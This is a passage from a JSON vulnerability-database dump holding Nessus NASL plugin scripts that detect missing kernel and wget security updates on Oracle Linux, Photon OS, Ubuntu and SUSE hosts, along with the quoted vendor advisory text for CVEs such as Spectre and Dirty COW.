\n[Orabug: 27386890]\n- x86: Clean up IBRS functionality resident in common code (Kanth \nGhatraju) [Orabug: 27403317]\n- x86: Display correct settings for the SPECTRE_V2 bug (Kanth Ghatraju) \n[Orabug: 27403317]\n- Set CONFIG_GENERIC_CPU_VULNERABILITIES flag (Kanth Ghatraju) [Orabug: \n27403317]\n- x86/cpu: Implement CPU vulnerabilites sysfs functions (Thomas \nGleixner) [Orabug: 27403317]\n- sysfs/cpu: Fix typos in vulnerability documentation (David Woodhouse) \n[Orabug: 27403317]\n- sysfs/cpu: Add vulnerability folder (Thomas Gleixner) [Orabug: 27403317]\n- x86/cpufeatures: Add X86_BUG_SPECTRE_V[12] (David Woodhouse) [Orabug: \n27403317]\n- x86/cpufeatures: Add X86_BUG_CPU_MELTDOWN (Kanth Ghatraju) [Orabug: \n27403317]\n- KVM: x86: Add memory barrier on vmcs field lookup (Andrew Honig) \n{CVE-2017-5753}\n- KVM: VMX: remove I/O port 0x80 bypass on Intel hosts (Andrew Honig) \n[Orabug: 27402301] {CVE-2017-1000407} {CVE-2017-1000407}\n- xfs: give all workqueues rescuer threads (Chris Mason) [Orabug: \n27397568]\n- ixgbevf: handle mbox_api_13 in ixgbevf_change_mtu (Joao Martins) \n[Orabug: 27397001]", "edition": 28, "cvss3": {"score": 7.4, "vector": "AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"}, "published": "2018-01-22T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2018-4017) (Spectre)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5753", "CVE-2017-1000407"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2018-4017.NASL", "href": "https://www.tenable.com/plugins/nessus/106225", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2018-4017.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106225);\n script_version(\"3.13\");\n script_cvs_date(\"Date: 2019/09/27 13:00:39\");\n\n script_cve_id(\"CVE-2017-1000407\", \"CVE-2017-5753\");\n script_xref(name:\"IAVA\", value:\"2018-A-0020\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2018-4017) (Spectre)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[4.1.12-112.14.13.el7uek]\n- Revert 'kernel.spec: Require the new microcode_ctl.' (Brian Maly)\n\n[4.1.12-112.14.12.el7uek]\n- xen-blkback: add pending_req allocation stats (Ankur Arora) [Orabug: \n27386890]\n- xen-blkback: move indirect req allocation out-of-line (Ankur Arora) \n[Orabug: 27386890]\n- xen-blkback: pull nseg validation out in a function (Ankur Arora) \n[Orabug: 27386890]\n- xen-blkback: make struct pending_req less monolithic (Ankur Arora) \n[Orabug: 27386890]\n- x86: Clean up IBRS functionality resident in common code (Kanth \nGhatraju) [Orabug: 27403317]\n- x86: Display correct settings for the SPECTRE_V2 bug (Kanth Ghatraju) \n[Orabug: 27403317]\n- Set CONFIG_GENERIC_CPU_VULNERABILITIES flag (Kanth Ghatraju) [Orabug: \n27403317]\n- x86/cpu: Implement CPU vulnerabilites sysfs functions (Thomas \nGleixner) [Orabug: 27403317]\n- sysfs/cpu: Fix typos in vulnerability documentation (David Woodhouse) \n[Orabug: 27403317]\n- sysfs/cpu: Add vulnerability folder (Thomas Gleixner) [Orabug: 27403317]\n- x86/cpufeatures: Add X86_BUG_SPECTRE_V[12] (David Woodhouse) [Orabug: \n27403317]\n- x86/cpufeatures: Add X86_BUG_CPU_MELTDOWN (Kanth Ghatraju) [Orabug: \n27403317]\n- KVM: x86: Add memory barrier on vmcs field lookup (Andrew Honig) \n{CVE-2017-5753}\n- KVM: VMX: remove I/O port 0x80 bypass on Intel hosts (Andrew Honig) \n[Orabug: 27402301] {CVE-2017-1000407} {CVE-2017-1000407}\n- xfs: give all workqueues rescuer threads (Chris Mason) [Orabug: \n27397568]\n- ixgbevf: handle mbox_api_13 in ixgbevf_change_mtu (Joao Martins) \n[Orabug: 27397001]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-January/007463.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-January/007464.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000407\", \"CVE-2017-5753\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2018-4017\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"4.1\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-112.14.13.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-112.14.13.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-112.14.13.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-112.14.13.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-112.14.13.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-112.14.13.el6uek\")) flag++;\n\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-112.14.13.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-112.14.13.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-112.14.13.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-112.14.13.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-112.14.13.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-112.14.13.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-03-17T22:39:25", "description": "An update of the wget package has been released.", "edition": 8, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-02-07T00:00:00", "title": "Photon OS 2.0: Wget PHSA-2017-2.0-0008", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6508", "CVE-2017-1000405"], "modified": "2019-02-07T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:wget", "cpe:/o:vmware:photonos:2.0"], "id": "PHOTONOS_PHSA-2017-2_0-0008_WGET.NASL", "href": "https://www.tenable.com/plugins/nessus/121793", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-2.0-0008. The text\n# itself is copyright (C) VMware, Inc.\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121793);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2019/02/07\");\n\n script_cve_id(\"CVE-2017-6508\");\n\n script_name(english:\"Photon OS 2.0: Wget PHSA-2017-2.0-0008\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the wget package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-2-8.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-1000405\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:wget\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 2.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"wget-1.19.1-4.ph2\")) flag++;\nif (rpm_check(release:\"PhotonOS-2.0\", reference:\"wget-debuginfo-1.19.1-4.ph2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wget\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-09T05:39:02", "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed\nin the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle\ncopy-on- write of transparent huge pages. A local attacker could use\nthis to cause a denial of service (application crashes) or possibly\ngain administrative privileges. (CVE-2017-1000405).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-08T00:00:00", "title": "Ubuntu 14.04 LTS : linux vulnerabilities (USN-3510-1) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "modified": "2017-12-08T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic"], "id": "UBUNTU_USN-3510-1.NASL", "href": "https://www.tenable.com/plugins/nessus/105106", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3510-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105106);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/04\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n script_xref(name:\"USN\", value:\"3510-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux vulnerabilities (USN-3510-1) (Dirty COW)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Mohamed Ghannam discovered that a use-after-free vulnerability existed\nin the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle\ncopy-on- write of transparent huge pages. A local attacker could use\nthis to cause a denial of service (application crashes) or possibly\ngain administrative privileges. (CVE-2017-1000405).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3510-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2020 Canonical, Inc. / NASL script (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3510-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-137-generic\", pkgver:\"3.13.0-137.186\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-137-generic-lpae\", pkgver:\"3.13.0-137.186\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-137-lowlatency\", pkgver:\"3.13.0-137.186\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic\", pkgver:\"3.13.0.137.146\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic-lpae\", pkgver:\"3.13.0.137.146\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"3.13.0.137.146\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:27:12", "description": "The SUSE Linux Enterprise 12 SP3 kernel was updated to receive various\nsecurity and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000405: A bug in the THP CoW support could be\n used by local attackers to corrupt memory of other\n processes and cause them to crash (bnc#1069496).\n\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (use-after-free) via a crafted SO_RCVBUF setsockopt\n system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-07T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:3225-1) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "modified": "2017-12-07T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-default"], "id": "SUSE_SU-2017-3225-1.NASL", "href": "https://www.tenable.com/plugins/nessus/105072", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:3225-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105072);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000405\", \"CVE-2017-16939\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : kernel (SUSE-SU-2017:3225-1) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The SUSE Linux Enterprise 12 SP3 kernel was updated to receive various\nsecurity and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000405: A bug in the THP CoW support could be\n used by local attackers to corrupt memory of other\n processes and cause them to crash (bnc#1069496).\n\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local\n users to gain privileges or cause a denial of service\n (use-after-free) via a crafted SO_RCVBUF setsockopt\n system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069496\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069702\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 